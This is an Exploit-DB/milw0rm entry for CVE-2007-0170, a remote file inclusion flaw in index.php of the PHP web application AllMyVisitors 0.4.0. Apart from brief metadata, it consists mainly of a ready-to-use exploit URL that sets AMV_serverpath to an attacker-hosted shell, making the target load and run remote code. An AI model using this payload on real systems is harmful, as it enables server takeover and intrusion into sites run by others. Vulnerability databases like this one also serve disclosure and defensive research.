AllMyVisitors 0.4.0 index.php Remote File Inclusion Vulnerability

2007-01-07T00:00:00
ID EDB-ID:3097
Type exploitdb
Reporter bd0rk
Modified 2007-01-07T00:00:00

Description

AllMyVisitors 0.4.0 (index.php) Remote File Inclusion Vulnerability. CVE-2007-0170. Webapps exploit for php platform

                                        
                                                                     AllMyVisitors 0.4.0 File Inclusion Vulnerability



Affected Software: AllMyVisitors 0.4.0

Download: http://www.php-resource.net//modules/AllMyLinks//action/gotolink.php?AML_linkid=11

Vulnerable Code in index.php

Bugfounder: bd0rk

[+]Exploit: http://[target]/[all_my_visitors_path]/index.php?AMV_openconfig=1&AMV_serverpath=http://[Shell]

# milw0rm.com [2007-01-07]